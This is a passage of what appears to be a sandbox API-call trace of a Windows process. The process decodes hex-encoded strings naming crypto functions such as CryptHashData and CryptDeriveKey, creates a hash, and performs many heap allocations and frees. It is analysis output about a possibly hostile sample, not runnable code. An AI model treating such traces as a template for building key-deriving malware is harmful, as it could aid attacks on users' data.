wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] lstrlenW (lpString="74") returned 2 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] lstrlenW (lpString="65") returned 2 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] lstrlenW (lpString="5B") returned 2 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] lstrlenW (lpString="5D") returned 2 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] lstrlenW (lpString="20") returned 2 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] lstrlenW (lpString="31") returned 2 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.309] lstrlenW (lpString="20") returned 2 [0085.310] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.310] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.310] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.310] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.310] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.310] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.310] lstrlenW (lpString="62") returned 2 [0085.310] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.310] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.310] lstrlenW (lpString="6F") returned 2 [0085.310] lstrlenW (lpString="6F") returned 2 [0085.310] lstrlenW (lpString="6C") returned 2 [0085.310] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.310] lstrlenW (lpString="43") returned 2 [0085.310] lstrlenW (lpString="72") returned 2 [0085.310] lstrlenW (lpString="79") returned 2 [0085.310] lstrlenW (lpString="70") returned 2 [0085.310] lstrlenW (lpString="74") returned 2 [0085.310] lstrlenW (lpString="48") returned 2 [0085.310] lstrlenW (lpString="61") returned 2 [0085.310] lstrlenW (lpString="73") returned 2 [0085.310] lstrlenW (lpString="68") returned 2 [0085.310] lstrlenW (lpString="44") returned 2 [0085.311] lstrlenW (lpString="61") returned 2 [0085.311] lstrlenW (lpString="74") returned 2 [0085.311] lstrlenW (lpString="61") returned 2 [0085.311] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.311] lstrlenW (lpString="68") returned 2 [0085.311] lstrlenW (lpString="61") returned 2 [0085.311] lstrlenW (lpString="6E") returned 2 [0085.311] lstrlenW (lpString="64") returned 2 [0085.311] lstrlenW (lpString="6C") returned 2 [0085.311] lstrlenW (lpString="65") returned 2 [0085.311] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.311] lstrlenW (lpString="73") returned 2 [0085.311] lstrlenW (lpString="74") returned 2 [0085.311] lstrlenW (lpString="72") returned 2 [0085.311] lstrlenW (lpString="75") returned 2 [0085.311] lstrlenW (lpString="63") returned 2 [0085.311] lstrlenW (lpString="74") returned 2 [0085.311] lstrlenW (lpString="2A") returned 2 [0085.368] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.368] lstrlenW (lpString="64") returned 2 [0085.368] lstrlenW (lpString="77") returned 2 [0085.368] lstrlenW (lpString="6F") returned 2 [0085.369] lstrlenW (lpString="72") returned 2 [0085.369] lstrlenW (lpString="64") returned 2 [0085.369] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.369] lstrlenW (lpString="64") returned 2 [0085.369] lstrlenW (lpString="77") returned 2 [0085.369] lstrlenW (lpString="6F") returned 2 [0085.369] lstrlenW (lpString="72") returned 2 [0085.369] lstrlenW (lpString="64") returned 2 [0085.369] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.369] lstrlenW (lpString="20") returned 2 [0085.369] lstrlenW (lpString="30") returned 2 [0085.369] lstrlenW (lpString="20") returned 2 [0085.369] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.369] lstrlenW (lpString="20") returned 2 [0085.369] lstrlenW (lpString="32") returned 2 [0085.369] lstrlenW (lpString="20") returned 2 [0085.369] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.369] lstrlenW (lpString="20") returned 2 [0085.369] lstrlenW (lpString="31") returned 2 [0085.369] lstrlenW (lpString="20") returned 2 [0085.369] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.369] lstrlenW (lpString="62") returned 2 [0085.369] lstrlenW (lpString="6F") returned 2 [0085.370] lstrlenW (lpString="6F") returned 2 [0085.370] lstrlenW (lpString="6C") returned 2 [0085.370] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.370] lstrlenW (lpString="43") returned 2 [0085.370] lstrlenW (lpString="72") returned 2 [0085.370] lstrlenW (lpString="79") returned 2 [0085.370] lstrlenW (lpString="70") returned 2 [0085.370] lstrlenW (lpString="74") returned 2 [0085.370] lstrlenW (lpString="44") returned 2 [0085.370] lstrlenW (lpString="65") returned 2 [0085.370] lstrlenW (lpString="72") returned 2 [0085.370] lstrlenW (lpString="69") returned 2 [0085.370] lstrlenW (lpString="76") returned 2 [0085.370] lstrlenW (lpString="65") returned 2 [0085.370] lstrlenW (lpString="4B") returned 2 [0085.370] lstrlenW (lpString="65") returned 2 [0085.370] lstrlenW (lpString="79") returned 2 [0085.371] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.372] lstrlenW (lpString="68") returned 2 [0085.380] lstrlenW (lpString="61") returned 2 [0085.380] lstrlenW (lpString="6E") returned 2 [0085.380] lstrlenW (lpString="64") returned 2 [0085.380] lstrlenW (lpString="6C") returned 2 [0085.380] lstrlenW (lpString="65") returned 2 [0085.380] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.380] lstrlenW (lpString="75") returned 2 [0085.430] lstrlenW (lpString="69") returned 2 [0085.430] lstrlenW (lpString="6E") returned 2 [0085.430] lstrlenW (lpString="74") returned 2 [0085.430] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.430] lstrlenW (lpString="68") returned 2 [0085.430] lstrlenW (lpString="61") returned 2 [0085.430] lstrlenW (lpString="6E") returned 2 [0085.430] lstrlenW (lpString="64") returned 2 [0085.430] lstrlenW (lpString="6C") returned 2 [0085.430] lstrlenW (lpString="65") returned 2 [0085.430] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.430] lstrlenW (lpString="64") returned 2 [0085.430] lstrlenW (lpString="77") returned 2 [0085.430] lstrlenW (lpString="6F") returned 2 [0085.430] lstrlenW (lpString="72") returned 2 [0085.430] lstrlenW (lpString="64") returned 2 [0085.430] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.431] lstrlenW (lpString="68") returned 2 [0085.431] lstrlenW (lpString="61") returned 2 [0085.431] lstrlenW (lpString="6E") returned 2 [0085.431] lstrlenW (lpString="64") returned 2 [0085.431] lstrlenW (lpString="6C") returned 2 [0085.431] lstrlenW (lpString="65") returned 2 [0085.431] lstrlenW (lpString="2A") returned 2 [0085.431] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.431] lstrlenW (lpString="20") returned 2 [0085.431] lstrlenW (lpString="30") returned 2 [0085.431] lstrlenW (lpString="20") returned 2 [0085.431] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.431] lstrlenW (lpString="20") returned 2 [0085.431] lstrlenW (lpString="30") returned 2 [0085.431] lstrlenW (lpString="20") returned 2 [0085.431] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.431] lstrlenW (lpString="20") returned 2 [0085.431] lstrlenW (lpString="33") returned 2 [0085.431] lstrlenW (lpString="20") returned 2 [0085.431] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.431] lstrlenW (lpString="20") returned 2 [0085.431] lstrlenW (lpString="31") returned 2 [0085.576] lstrlenW (lpString="20") returned 2 [0085.576] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.576] lstrlenW (lpString="20") returned 2 [0085.576] lstrlenW (lpString="30") returned 2 [0085.576] lstrlenW (lpString="20") returned 2 [0085.576] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.576] lstrlenW (lpString="20") returned 2 [0085.576] lstrlenW (lpString="35") returned 2 [0085.576] lstrlenW (lpString="20") returned 2 [0085.576] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.576] lstrlenW (lpString="20") returned 2 [0085.576] lstrlenW (lpString="30") returned 2 [0085.576] lstrlenW (lpString="20") returned 2 [0085.576] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.576] lstrlenW (lpString="62") returned 2 [0085.576] lstrlenW (lpString="6F") returned 2 [0085.576] lstrlenW (lpString="6F") returned 2 [0085.576] lstrlenW (lpString="6C") returned 2 [0085.576] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.577] lstrlenW (lpString="43") returned 2 [0085.577] lstrlenW (lpString="72") returned 2 [0085.577] lstrlenW (lpString="79") returned 2 [0085.577] lstrlenW (lpString="70") returned 2 [0085.577] lstrlenW (lpString="74") returned 2 [0085.577] lstrlenW (lpString="44") returned 2 [0085.577] lstrlenW (lpString="65") returned 2 [0085.577] lstrlenW (lpString="73") returned 2 [0085.577] lstrlenW (lpString="74") returned 2 [0085.577] lstrlenW (lpString="72") returned 2 [0085.577] lstrlenW (lpString="6F") returned 2 [0085.577] lstrlenW (lpString="79") returned 2 [0085.577] lstrlenW (lpString="48") returned 2 [0085.577] lstrlenW (lpString="61") returned 2 [0085.577] lstrlenW (lpString="73") returned 2 [0085.577] lstrlenW (lpString="68") returned 2 [0085.577] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.577] lstrlenW (lpString="68") returned 2 [0085.577] lstrlenW (lpString="61") returned 2 [0085.577] lstrlenW (lpString="6E") returned 2 [0085.577] lstrlenW (lpString="64") returned 2 [0085.577] lstrlenW (lpString="6C") returned 2 [0085.577] lstrlenW (lpString="65") returned 2 [0085.577] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.578] lstrlenW (lpString="20") returned 2 [0085.578] lstrlenW (lpString="30") returned 2 [0085.578] lstrlenW (lpString="20") returned 2 [0085.620] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0085.621] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0085.621] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0085.621] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0085.621] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0085.621] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0085.621] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0085.621] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0085.621] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0085.621] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0085.621] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.621] lstrlenW (lpString="20") returned 2 [0085.621] lstrlenW (lpString="32") returned 2 [0085.621] lstrlenW (lpString="20") returned 2 [0085.621] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0085.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x29f1038, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0085.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0085.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712c8 [0085.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71288 [0085.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71208 [0085.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712b8 [0085.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712d8 [0085.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71288 | out: hHeap=0x2af0000) returned 1 [0085.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712b8 | out: hHeap=0x2af0000) returned 1 [0085.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712d8 | out: hHeap=0x2af0000) returned 1 [0085.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0085.622] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71368 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1398 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712b8 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1398 | out: hHeap=0x2af0000) returned 1 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712b8 | out: hHeap=0x2af0000) returned 1 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1398 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71338 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71338 | out: hHeap=0x2af0000) returned 1 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1398 | out: hHeap=0x2af0000) returned 1 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1398 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711d8 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39c0 | out: hHeap=0x2af0000) returned 1 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0085.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71318 [0085.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39c0 | out: hHeap=0x2af0000) returned 1 [0085.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0085.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0085.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a20 [0085.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712b8 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712b8 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0085.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64930 [0085.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a38 [0085.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a649a8 [0085.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71328 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a38 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711f8 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a08 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a98 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64870 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eef38 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0085.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64708 | out: hHeap=0x2af0000) returned 1 [0085.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 